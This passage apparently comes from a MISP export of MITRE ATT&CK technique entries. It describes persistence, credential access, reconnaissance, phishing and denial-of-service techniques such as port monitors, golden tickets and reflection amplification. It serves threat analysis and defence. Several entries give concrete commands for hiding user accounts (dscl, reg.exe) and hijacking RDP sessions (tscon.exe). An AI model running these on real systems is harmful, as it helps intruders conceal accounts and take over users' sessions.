Adversaries may use port monitors to run an attacker supplied DLL during system boot for persistence or privilege escalation. A port monitor can be set through the <code>AddMonitor</code> API call to set a DLL to be loaded at startup. (Citation: AddMonitor) This DLL can be located in <code>C:\Windows\System32</code> and will be loaded by the print spooler service, spoolsv.exe, on boot. The spoolsv.exe process also runs under SYSTEM level permissions. (Citation: Bloxham) Alternatively, an arbitrary DLL can be loaded if permissions allow writing a fully-qualified pathname for that DLL to <code>HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors</code>.

The Registry key contains entries for the following:

Local Port
Standard TCP/IP Port
USB Monitor
WSD Port

Adversaries can use this technique to load malicious code at startup that will persist on system reboot and execute as SYSTEM.

The tag is: misp-galaxy:mitre-attack-pattern="Port Monitors - T1547.010"

Table 3745. Table References
Links
https://attack.mitre.org/techniques/T1547/010
http://msdn.microsoft.com/en-us/library/dd183341
https://www.defcon.org/images/defcon-22/dc-22-presentations/Bloxham/DEFCON-22-Brady-Bloxham-Windows-API-Abuse-UPDATED.pdf
https://technet.microsoft.com/en-us/sysinternals/bb963902

Identify Roles - T1591.004

Adversaries may gather information about identities and roles within the victim organization that can be used during targeting. Information about business roles may reveal a variety of targetable details, including identifiable information for key personnel as well as what data/resources they have access to.

Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about business roles may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: ThreatPost Broadvoice Leak) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566)).

The tag is: misp-galaxy:mitre-attack-pattern="Identify Roles - T1591.004"

Table 3746. Table References
Links
https://attack.mitre.org/techniques/T1591/004
https://threatpost.com/broadvoice-leaks-350m-records-voicemail-transcripts/160158/

System Checks - T1497.001

Adversaries may employ various system checks to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.(Citation: Deloitte Environment Awareness)

Specific checks will vary based on the target and/or adversary, but may involve behaviors such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047), [PowerShell](https://attack.mitre.org/techniques/T1059/001), [System Information Discovery](https://attack.mitre.org/techniques/T1082), and [Query Registry](https://attack.mitre.org/techniques/T1012) to obtain system information and search for VME artifacts. Adversaries may search for VME artifacts in memory, processes, file system, hardware, and/or the Registry. Adversaries may use scripting to automate these checks into one script and then have the program exit if it determines the system to be a virtual environment.

Checks could include generic system properties such as host/domain name and samples of network traffic. Adversaries may also check the network adapters addresses, CPU core count, and available memory/drive size.

Other common checks may enumerate services running that are unique to these applications, installed programs on the system, manufacturer/product fields for strings relating to virtual machine applications, and VME-specific hardware/processor instructions.(Citation: McAfee Virtual Jan 2017) In applications like VMWare, adversaries can also use a special I/O port to send commands and receive output.

Hardware checks, such as the presence of the fan, temperature, and audio devices, could also be used to gather evidence that can be indicative a virtual environment. Adversaries may also query for specific readings from these devices.(Citation: Unit 42 OilRig Sept 2018)

The tag is: misp-galaxy:mitre-attack-pattern="System Checks - T1497.001"

Table 3747. Table References
Links
https://attack.mitre.org/techniques/T1497/001
https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/stopping-malware-fake-virtual-machine/
https://researchcenter.paloaltonetworks.com/2018/09/unit42-oilrig-targets-middle-eastern-government-adds-evasion-techniques-oopsie/

Golden Ticket - T1558.001

Adversaries who have the KRBTGT account password hash may forge Kerberos ticket-granting tickets (TGT), also known as a golden ticket.(Citation: AdSecurity Kerberos GT Aug 2015) Golden tickets enable adversaries to generate authentication material for any account in Active Directory.(Citation: CERT-EU Golden Ticket Protection)

Using a golden ticket, adversaries are then able to request ticket granting service (TGS) tickets, which enable access to specific resources. Golden tickets require adversaries to interact with the Key Distribution Center (KDC) in order to obtain TGS.(Citation: ADSecurity Detecting Forged Tickets)

The KDC service runs all on domain controllers that are part of an Active Directory domain. KRBTGT is the Kerberos Key Distribution Center (KDC) service account and is responsible for encrypting and signing all Kerberos tickets.(Citation: ADSecurity Kerberos and KRBTGT) The KRBTGT password hash may be obtained using [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) and privileged access to a domain controller.

The tag is: misp-galaxy:mitre-attack-pattern="Golden Ticket - T1558.001"

Table 3748. Table References
Links
https://attack.mitre.org/techniques/T1558/001
https://adsecurity.org/?p=1640
https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf
https://adsecurity.org/?p=1515
https://adsecurity.org/?p=483
https://blog.stealthbits.com/detect-pass-the-ticket-attacks
https://gallery.technet.microsoft.com/scriptcenter/Kerberos-Golden-Ticket-b4814285

Spearphishing Attachment - T1566.001

Adversaries may send spearphishing emails with a malicious attachment in an attempt to gain access to victim systems. Spearphishing attachment is a specific variant of spearphishing. Spearphishing attachment is different from other forms of spearphishing in that it employs the use of malware attached to an email. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries attach a file to the spearphishing email and usually rely upon [User Execution](https://attack.mitre.org/techniques/T1204) to gain execution. Spearphishing may also involve social engineering techniques, such as posing as a trusted source.

There are many options for the attachment such as Microsoft Office documents, executables, PDFs, or archived files. Upon opening the attachment (and potentially clicking past protections), the adversary’s payload exploits a vulnerability or directly executes on the user’s system. The text of the spearphishing email usually tries to give a plausible reason why the file should be opened, and may explain how to bypass system protections in order to do so. The email may also contain instructions on how to decrypt an attachment, such as a zip file password, in order to evade email boundary defenses. Adversaries frequently manipulate file extensions and icons in order to make attached executables appear to be document files, or files exploiting one application appear to be a file for a different one.

The tag is: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001"

Table 3749. Table References
Links
https://attack.mitre.org/techniques/T1566/001
https://capec.mitre.org/data/definitions/163.html
https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/anti-spoofing-protection?view=o365-worldwide
https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
https://www.elastic.co/blog/embracing-offensive-tooling-building-detections-against-koadic-using-eql

Create Snapshot - T1578.001

An adversary may create a snapshot or data backup within a cloud account to evade defenses. A snapshot is a point-in-time copy of an existing cloud compute component such as a virtual machine (VM), virtual hard drive, or volume. An adversary may leverage permissions to create a snapshot in order to bypass restrictions that prevent access to existing compute service infrastructure, unlike in [Revert Cloud Instance](https://attack.mitre.org/techniques/T1578/004) where an adversary may revert to a snapshot to evade detection and remove evidence of their presence.

An adversary may [Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002), mount one or more created snapshots to that instance, and then apply a policy that allows the adversary access to the created instance, such as a firewall policy that allows them inbound and outbound SSH access.(Citation: Mandiant M-Trends 2020)

The tag is: misp-galaxy:mitre-attack-pattern="Create Snapshot - T1578.001"

Table 3750. Table References
Links
https://attack.mitre.org/techniques/T1578/001
https://content.fireeye.com/m-trends/rpt-m-trends-2020
https://docs.aws.amazon.com/aws-backup/latest/devguide/logging-using-cloudtrail.html
https://docs.microsoft.com/en-us/azure/backup/backup-azure-monitoring-use-azuremonitor
https://cloud.google.com/logging/docs/audit#admin-activity
https://cloud.google.com/compute/docs/instances/create-start-instance#api_2

Spearphishing Service - T1598.001

Adversaries may send spearphishing messages via third-party services to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.

All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries send messages through various social media services, personal webmail, and other non-enterprise controlled services.(Citation: ThreatPost Social Media Phishing) These services are more likely to have a less-strict security policy than an enterprise. As with most kinds of spearphishing, the goal is to generate rapport with the target or get the target’s interest in some way. Adversaries may create fake social media accounts and message employees for potential job opportunities. Doing so allows a plausible reason for asking about services, policies, and information about their environment. Adversaries may also use information from previous reconnaissance efforts (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)) to craft persuasive and believable lures.

The tag is: misp-galaxy:mitre-attack-pattern="Spearphishing Service - T1598.001"

Table 3751. Table References
Links
https://attack.mitre.org/techniques/T1598/001
https://threatpost.com/facebook-launching-pad-phishing-attacks/160351/

Component Firmware - T1542.002

Adversaries may modify component firmware to persist on systems. Some adversaries may employ sophisticated means to compromise computer components and install malicious firmware that will execute adversary code outside of the operating system and main system firmware or BIOS. This technique may be similar to [System Firmware](https://attack.mitre.org/techniques/T1542/001) but conducted upon other system components/devices that may not have the same capability or level of integrity checking.

Malicious component firmware could provide both a persistent level of access to systems despite potential typical failures to maintain access and hard disk re-images, as well as a way to evade host software-based defenses and integrity checks.

The tag is: misp-galaxy:mitre-attack-pattern="Component Firmware - T1542.002"

Table 3752. Table References
Links
https://attack.mitre.org/techniques/T1542/002
https://www.smartmontools.org/
https://www.itworld.com/article/2853992/3-tools-to-check-your-hard-drives-health-and-make-sure-its-not-already-dying-on-you.html

Systemd Service - T1543.002

Adversaries may create or modify systemd services to repeatedly execute malicious payloads as part of persistence. The systemd service manager is commonly used for managing background daemon processes (also known as services) and other system resources.(Citation: Linux man-pages: systemd January 2014)(Citation: Freedesktop.org Linux systemd 29SEP2018) Systemd is the default initialization (init) system on many Linux distributions starting with Debian 8, Ubuntu 15.04, CentOS 7, RHEL 7, Fedora 15, and replaces legacy init systems including SysVinit and Upstart while remaining backwards compatible with the aforementioned init systems.

Systemd utilizes configuration files known as service units to control how services boot and under what conditions. By default, these unit files are stored in the <code>/etc/systemd/system</code> and <code>/usr/lib/systemd/system</code> directories and have the file extension <code>.service</code>. Each service unit file may contain numerous directives that can execute system commands:

ExecStart, ExecStartPre, and ExecStartPost directives cover execution of commands when a services is started manually by 'systemctl' or on system start if the service is set to automatically start.
ExecReload directive covers when a service restarts.
ExecStop and ExecStopPost directives cover when a service is stopped or manually by 'systemctl'.

While adversaries typically require root privileges to create/modify service unit files in the <code>/etc/systemd/system</code> and <code>/usr/lib/systemd/system</code> directories, low privilege users can create/modify service unit files in directories such as <code>~/.config/systemd/user/</code> to achieve user-level persistence.(Citation: Rapid7 Service Persistence 22JUNE2016)

The tag is: misp-galaxy:mitre-attack-pattern="Systemd Service - T1543.002"

Table 3753. Table References
Links
https://attack.mitre.org/techniques/T1543/002
https://capec.mitre.org/data/definitions/550.html
https://capec.mitre.org/data/definitions/551.html
http://man7.org/linux/man-pages/man1/systemd.1.html
https://www.freedesktop.org/wiki/Software/systemd/
https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang
https://www.rapid7.com/db/modules/exploit/linux/local/service_persistence

Bash History - T1552.003

Adversaries may search the bash command history on compromised systems for insecurely stored credentials. Bash keeps track of the commands users type on the command-line with the "history" utility. Once a user logs out, the history is flushed to the user’s <code>.bash_history</code> file. For each user, this file resides at the same location: <code>~/.bash_history</code>. Typically, this file keeps track of the user’s last 500 commands. Users often type usernames and passwords on the command-line as parameters to programs, which then get saved to this file when they log out. Attackers can abuse this by looking through the file for potential credentials. (Citation: External to DA, the OS X Way)

The tag is: misp-galaxy:mitre-attack-pattern="Bash History - T1552.003"

Table 3754. Table References
Links
https://attack.mitre.org/techniques/T1552/003
http://www.slideshare.net/StephanBorosh/external-to-da-the-os-x-way

Code Signing - T1553.002

Adversaries may create, acquire, or steal code signing materials to sign their malware or tools. Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. (Citation: Wikipedia Code Signing) The certificates used during an operation may be created, acquired, or stolen by the adversary. (Citation: Securelist Digital Certificates) (Citation: Symantec Digital Certificates) Unlike [Invalid Code Signature](https://attack.mitre.org/techniques/T1036/001), this activity will result in a valid signature.

Code signing to verify software on first run can be used on modern Windows and macOS/OS X systems. It is not used on Linux due to the decentralized nature of the platform. (Citation: Wikipedia Code Signing)

Code signing certificates may be used to bypass security policies that require signed code to execute on a system.

The tag is: misp-galaxy:mitre-attack-pattern="Code Signing - T1553.002"

Table 3755. Table References
Links
https://attack.mitre.org/techniques/T1553/002
https://en.wikipedia.org/wiki/Code_signing
https://securelist.com/why-you-shouldnt-completely-trust-files-signed-with-digital-certificates/68593/
http://www.symantec.com/connect/blogs/how-attackers-steal-private-keys-digital-certificates

RDP Hijacking - T1563.002

Adversaries may hijack a legitimate user’s remote desktop session to move laterally within an environment. Remote desktop is a common feature in operating systems. It allows a user to log into an interactive session with a system desktop graphical user interface on a remote system. Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).(Citation: TechNet Remote Desktop Services)

Adversaries may perform RDP session hijacking which involves stealing a legitimate user’s remote session. Typically, a user is notified when someone else is trying to steal their session. With System permissions and using Terminal Services Console, c:\windows\system32\tscon.exe [session number to be stolen], an adversary can hijack a session without the need for credentials or prompts to the user.(Citation: RDP Hijacking Korznikov) This can be done remotely or locally and with active or disconnected sessions.(Citation: RDP Hijacking Medium) It can also lead to [Remote System Discovery](https://attack.mitre.org/techniques/T1018) and Privilege Escalation by stealing a Domain Admin or higher privileged account session. All of this can be done by using native Windows commands, but it has also been added as a feature in red teaming tools.(Citation: Kali Redsnarf)

The tag is: misp-galaxy:mitre-attack-pattern="RDP Hijacking - T1563.002"

Table 3756. Table References
Links
https://attack.mitre.org/techniques/T1563/002
https://technet.microsoft.com/en-us/windowsserver/ee236407.aspx
http://www.korznikov.com/2017/03/0-day-or-feature-privilege-escalation.html
https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6
https://github.com/nccgroup/redsnarf

Asymmetric Cryptography - T1573.002

Adversaries may employ a known asymmetric encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Asymmetric cryptography, also known as public key cryptography, uses a keypair per party: one public that can be freely distributed, and one private. Due to how the keys are generated, the sender encrypts data with the receiver’s public key and the receiver decrypts the data with their private key. This ensures that only the intended recipient can read the encrypted data. Common public key encryption algorithms include RSA and ElGamal.

For efficiency, many protocols (including SSL/TLS) use symmetric cryptography once a connection is established, but use asymmetric cryptography to establish or transmit a key. As such, these protocols are classified as [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002).

The tag is: misp-galaxy:mitre-attack-pattern="Asymmetric Cryptography - T1573.002"

Table 3757. Table References
Links
https://attack.mitre.org/techniques/T1573/002
http://www.sans.org/reading-room/whitepapers/analyst/finding-hidden-threats-decrypting-ssl-34840
https://insights.sei.cmu.edu/cert/2015/03/the-risks-of-ssl-inspection.html
https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

DNS Server - T1583.002

Adversaries may set up their own Domain Name System (DNS) servers that can be used during targeting. During post-compromise activity, adversaries may utilize DNS traffic for various tasks, including for Command and Control (ex: [Application Layer Protocol](https://attack.mitre.org/techniques/T1071)). Instead of hijacking existing DNS servers, adversaries may opt to configure and run their own DNS servers in support of operations.

By running their own DNS servers, adversaries can have more control over how they administer server-side DNS C2 traffic ([DNS](https://attack.mitre.org/techniques/T1071/004)). With control over a DNS server, adversaries can configure DNS applications to provide conditional responses to malware and, generally, have more flexibility in the structure of the DNS-based C2 channel.(Citation: Unit42 DNS Mar 2019)

The tag is: misp-galaxy:mitre-attack-pattern="DNS Server - T1583.002"

Table 3758. Table References
Links
https://attack.mitre.org/techniques/T1583/002
https://unit42.paloaltonetworks.com/dns-tunneling-how-dns-can-be-abused-by-malicious-actors/

Search Engines - T1593.002

Adversaries may use search engines to collect information about victims that can be used during targeting. Search engine services typical crawl online sites to index context and may provide users with specialized syntax to search for specific keywords or specific types of content (i.e. filetypes).(Citation: SecurityTrails Google Hacking)(Citation: ExploitDB GoogleHacking)

Adversaries may craft various search engine queries depending on what information they seek to gather. Threat actors may use search engines to harvest general information about victims, as well as use specialized queries to look for spillages/leaks of sensitive information such as network details or credentials. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Valid Accounts](https://attack.mitre.org/techniques/T1078) or [Phishing](https://attack.mitre.org/techniques/T1566)).

The tag is: misp-galaxy:mitre-attack-pattern="Search Engines - T1593.002"

Table 3759. Table References
Links
https://attack.mitre.org/techniques/T1593/002
https://securitytrails.com/blog/google-hacking-techniques
https://www.exploit-db.com/google-hacking-database

TFTP Boot - T1542.005

Adversaries may abuse netbooting to load an unauthorized network device operating system from a Trivial File Transfer Protocol (TFTP) server. TFTP boot (netbooting) is commonly used by network administrators to load configuration-controlled network device images from a centralized management server. Netbooting is one option in the boot sequence and can be used to centralize, manage, and control device images.

Adversaries may manipulate the configuration on the network device specifying use of a malicious TFTP server, which may be used in conjunction with [Modify System Image](https://attack.mitre.org/techniques/T1601) to load a modified image on device startup or reset. The unauthorized image allows adversaries to modify device configuration, add malicious capabilities to the device, and introduce backdoors to maintain control of the network device while minimizing detection through use of a standard functionality. This technique is similar to [ROMMONkit](https://attack.mitre.org/techniques/T1542/004) and may result in the network device running a modified image. (Citation: Cisco Blog Legacy Device Attacks)

The tag is: misp-galaxy:mitre-attack-pattern="TFTP Boot - T1542.005"

Table 3760. Table References
Links
https://attack.mitre.org/techniques/T1542/005
https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
https://tools.cisco.com/security/center/resources/integrity_assurance.html#35
https://tools.cisco.com/security/center/resources/integrity_assurance.html#7
https://tools.cisco.com/security/center/resources/integrity_assurance.html#13
https://tools.cisco.com/security/center/resources/integrity_assurance.html#23
https://tools.cisco.com/security/center/resources/integrity_assurance.html#26

Private Keys - T1552.004

Adversaries may search for private key certificate files on compromised systems for insecurely stored credentials. Private cryptographic keys and certificates are used for authentication, encryption/decryption, and digital signatures.(Citation: Wikipedia Public Key Crypto) Common key and certificate file extensions include: .key, .pgp, .gpg, .ppk., .p12, .pem, .pfx, .cer, .p7b, .asc.

Adversaries may also look in common key directories, such as <code>~/.ssh</code> for SSH keys on * nix-based systems or <code>C:\Users\(username)\.ssh\</code> on Windows. These private keys can be used to authenticate to [Remote Services](https://attack.mitre.org/techniques/T1021) like SSH or for use in decrypting other collected files such as email.

Adversary tools have been discovered that search compromised systems for file extensions relating to cryptographic keys and certificates.(Citation: Kaspersky Careto)(Citation: Palo Alto Prince of Persia)

Some private keys require a password or passphrase for operation, so an adversary may also use [Input Capture](https://attack.mitre.org/techniques/T1056) for keylogging or attempt to [Brute Force](https://attack.mitre.org/techniques/T1110) the passphrase off-line.

The tag is: misp-galaxy:mitre-attack-pattern="Private Keys - T1552.004"

Table 3761. Table References
Links
https://attack.mitre.org/techniques/T1552/004
https://en.wikipedia.org/wiki/Public-key_cryptography
https://kasperskycontenthub.com/wp-content/uploads/sites/43/vlpdfs/unveilingthemask_v1.0.pdf
https://researchcenter.paloaltonetworks.com/2016/06/unit42-prince-of-persia-game-over/

Hidden Users - T1564.002

Adversaries may use hidden users to mask the presence of user accounts they create or modify. Normal users may want to hide users when there are many users accounts on a given system or want to keep an account hidden from the other users on the system.

In macOS, every user account has a userID associated with it. When creating a user, you can specify the userID for that account. There is a property value in <code>/Library/Preferences/com.apple.loginwindow</code> called <code>Hide500Users</code> that prevents users with userIDs 500 and lower from appearing at the login screen. When using the [Create Account](https://attack.mitre.org/techniques/T1136) technique with a userID under 500 (ex: <code>sudo dscl . -create /Users/username UniqueID 401</code>) and enabling this property (setting it to Yes), an adversary can conceal user accounts. (Citation: Cybereason OSX Pirrit)

In Windows, adversaries may hide user accounts via settings in the Registry. For example, an adversary may add a value to the Windows Registry (via [Reg](https://attack.mitre.org/software/S0075) or other means) that will hide the user “test” from the Windows login screen: <code>reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccountsUserList' /v test /t REG_DWORD /d 0 /f</code>.(Citation: FireEye SMOKEDHAM June 2021)(Citation: US-CERT TA18-074A)

The tag is: misp-galaxy:mitre-attack-pattern="Hidden Users - T1564.002"

Table 3762. Table References
Links
https://attack.mitre.org/techniques/T1564/002
http://go.cybereason.com/rs/996-YZT-709/images/Cybereason-Lab-Analysis-OSX-Pirrit-4-6-16.pdf
https://www.fireeye.com/blog/threat-research/2021/06/darkside-affiliate-supply-chain-software-compromise.html
https://www.us-cert.gov/ncas/alerts/TA18-074A

Authentication Package - T1547.002

Adversaries may abuse authentication packages to execute DLLs when the system boots. Windows authentication package DLLs are loaded by the Local Security Authority (LSA) process at system start. They provide support for multiple logon processes and multiple security protocols to the operating system. (Citation: MSDN Authentication Packages)

Adversaries can use the autostart mechanism provided by LSA authentication packages for persistence by placing a reference to a binary in the Windows Registry location <code>HKLM\SYSTEM\CurrentControlSet\Control\Lsa\</code> with the key value of <code>"Authentication Packages"=<target binary></code>. The binary will then be executed by the system when the authentication packages are loaded.

The tag is: misp-galaxy:mitre-attack-pattern="Authentication Package - T1547.002"

Table 3763. Table References
Links
https://attack.mitre.org/techniques/T1547/002
https://msdn.microsoft.com/library/windows/desktop/aa374733.aspx
http://docplayer.net/20839173-Analysis-of-malicious-security-support-provider-dlls.html
https://technet.microsoft.com/en-us/library/dn408187.aspx

DNS Server - T1584.002

Adversaries may compromise third-party DNS servers that can be used during targeting. During post-compromise activity, adversaries may utilize DNS traffic for various tasks, including for Command and Control (ex: [Application Layer Protocol](https://attack.mitre.org/techniques/T1071)). Instead of setting up their own DNS servers, adversaries may compromise third-party DNS servers in support of operations.

By compromising DNS servers, adversaries can alter DNS records. Such control can allow for redirection of an organization’s traffic, facilitating Collection and Credential Access efforts for the adversary.(Citation: Talos DNSpionage Nov 2018)(Citation: FireEye DNS Hijack 2019) Adversaries may also be able to silently create subdomains pointed at malicious servers without tipping off the actual owner of the DNS server.(Citation: CiscoAngler)(Citation: Proofpoint Domain Shadowing)

The tag is: misp-galaxy:mitre-attack-pattern="DNS Server - T1584.002"

Table 3764. Table References
Links
https://attack.mitre.org/techniques/T1584/002
https://blog.talosintelligence.com/2018/11/dnspionage-campaign-targets-middle-east.html
https://www.fireeye.com/blog/threat-research/2019/01/global-dns-hijacking-campaign-dns-record-manipulation-at-scale.html
https://blogs.cisco.com/security/talos/angler-domain-shadowing
https://www.proofpoint.com/us/threat-insight/post/The-Shadow-Knows

Client Configurations - T1592.004

Adversaries may gather information about the victim’s client configurations that can be used during targeting. Information about client configurations may include a variety of details and settings, including operating system/version, virtualization, architecture (ex: 32 or 64 bit), language, and/or time zone.

Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) (ex: listening ports, server banners, user agent strings) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.(Citation: ATT ScanBox) Information about the client configurations may also be exposed to adversaries via online or other accessible data sets (ex: job postings, network maps, assessment reports, resumes, or purchase invoices). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [External Remote Services](https://attack.mitre.org/techniques/T1133)).

The tag is: misp-galaxy:mitre-attack-pattern="Client Configurations - T1592.004"

Table 3765. Table References
Links
https://attack.mitre.org/techniques/T1592/004
https://cybersecurity.att.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks
https://threatconnect.com/blog/infrastructure-research-hunting/

Reflection Amplification - T1498.002

Adversaries may attempt to cause a denial of service by reflecting a high-volume of network traffic to a target. This type of Network DoS takes advantage of a third-party server intermediary that hosts and will respond to a given spoofed source IP address. This third-party server is commonly termed a reflector. An adversary accomplishes a reflection attack by sending packets to reflectors with the spoofed address of the victim. Similar to Direct Network Floods, more than one system may be used to conduct the attack, or a botnet may be used. Likewise, one or more reflector may be used to focus traffic on the target.(Citation: Cloudflare ReflectionDoS May 2017)

Reflection attacks often take advantage of protocols with larger responses than requests in order to amplify their traffic, commonly known as a Reflection Amplification attack. Adversaries may be able to generate an increase in volume of attack traffic that is several orders of magnitude greater than the requests sent to the amplifiers. The extent of this increase will depending upon many variables, such as the protocol in question, the technique used, and the amplifying servers that actually produce the amplification in attack volume. Two prominent protocols that have enabled Reflection Amplification Floods are DNS(Citation: Cloudflare DNSamplficationDoS) and NTP(Citation: Cloudflare NTPamplifciationDoS), though the use of several others in the wild have been documented.(Citation: Arbor AnnualDoSreport Jan 2018) In particular, the memcache protocol showed itself to be a powerful protocol, with amplification sizes up to 51,200 times the requesting packet.(Citation: Cloudflare Memcrashed Feb 2018)

The tag is: misp-galaxy:mitre-attack-pattern="Reflection Amplification - T1498.002"

Table 3766. Table References
Links
https://attack.mitre.org/techniques/T1498/002
https://capec.mitre.org/data/definitions/490.html
https://blog.cloudflare.com/reflections-on-reflections/
https://www.cloudflare.com/learning/ddos/dns-amplification-ddos-attack/
https://www.cloudflare.com/learning/ddos/ntp-amplification-ddos-attack/
https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf
https://blog.cloudflare.com/memcrashed-major-amplification-attacks-from-port-11211/
https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf

Securityd Memory - T1555.002

An adversary may obtain root access (allowing them to read securityd’s memory), then they can scan through memory to find the correct sequence of keys in relatively few tries to decrypt the user’s logon keychain. This provides the adversary with all the plaintext passwords for users, WiFi, mail, browsers, certificates, secure notes, etc.(Citation: OS X Keychain) (Citation: OSX Keydnap malware)

In OS X prior to El Capitan, users with root access can read plaintext keychain passwords of logged-in users because Apple’s keychain implementation allows these credentials to be cached so that users are not repeatedly prompted for passwords. (Citation: OS X Keychain) (Citation: External to DA, the OS X Way) Apple’s securityd utility takes the user’s logon password, encrypts it with PBKDF2, and stores this master key in memory. Apple also uses a set of keys and algorithms to encrypt the user’s password, but once the master key is found, an attacker need only iterate over the other values to unlock the final password.(Citation: OS X Keychain)

The tag is: misp-galaxy:mitre-attack-pattern="Securityd Memory - T1555.002"

Table 3767. Table References
Links
https://attack.mitre.org/techniques/T1555/002
http://juusosalonen.com/post/30923743427/breaking-into-the-os-x-keychain
https://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-hungry-credentials/
http://www.slideshare.net/StephanBorosh/external-to-da-the-os-x-way

Container API - T1552.007

Adversaries may gather credentials via APIs within a containers environment. APIs in these environments, such as the Docker API and Kubernetes APIs, allow a user to remotely manage their container resources and cluster components.(Citation: Docker API)(Citation: Kubernetes API)

An adversary may access the Docker API to collect logs that contain credentials to cloud, container, and various other resources in the environment.(Citation: Unit 42 Unsecured Docker Daemons) An adversary with sufficient permissions, such as via a pod’s service account, may also use the Kubernetes API to retrieve credentials from the Kubernetes API server. These credentials may include those needed for Docker API authentication or secrets from Kubernetes cluster components.

The tag is: misp-galaxy:mitre-attack-pattern="Container API - T1552.007"

Table 3768. Table References
Links
https://attack.mitre.org/techniques/T1552/007
https://docs.docker.com/engine/api/v1.41/
https://kubernetes.io/docs/concepts/overview/kubernetes-api/
https://unit42.paloaltonetworks.com/attackers-tactics-and-techniques-in-unsecured-docker-daemons-revealed/

Email Accounts - T1585.002

Adversaries may create email accounts that can be used during targeting. Adversaries can use accounts created with email providers to further their operations, such as leveraging them to conduct [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Phishing](https://attack.mitre.org/techniques/T1566).(Citation: Mandiant APT1) Adversaries may also take steps to cultivate a persona around the email account, such as through use of [Social Media Accounts](https://attack.mitre.org/techniques/T1585/001), to increase the chance of success of follow-on behaviors. Created email accounts can also be used in the acquisition of infrastructure (ex: [Domains](https://attack.mitre.org/techniques/T1583/001)).(Citation: Mandiant APT1)

To decrease the chance of physically tying back operations to themselves, adversaries may make use of disposable email services.(Citation: Trend Micro R980 2016)

The tag is: misp-galaxy:mitre-attack-pattern="Email Accounts - T1585.002"

Table 3769. Table References
Links
https://attack.mitre.org/techniques/T1585/002
https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf
https://blog.trendmicro.com/trendlabs-security-intelligence/r980-ransomware-disposable-email-service/

Silver Ticket - T1558.002

Adversaries who have the password hash of a target service account (e.g. SharePoint, MSSQL) may forge Kerberos ticket granting service (TGS) tickets, also known as silver tickets. Kerberos TGS tickets are also known as service tickets.(Citation: ADSecurity Silver Tickets)

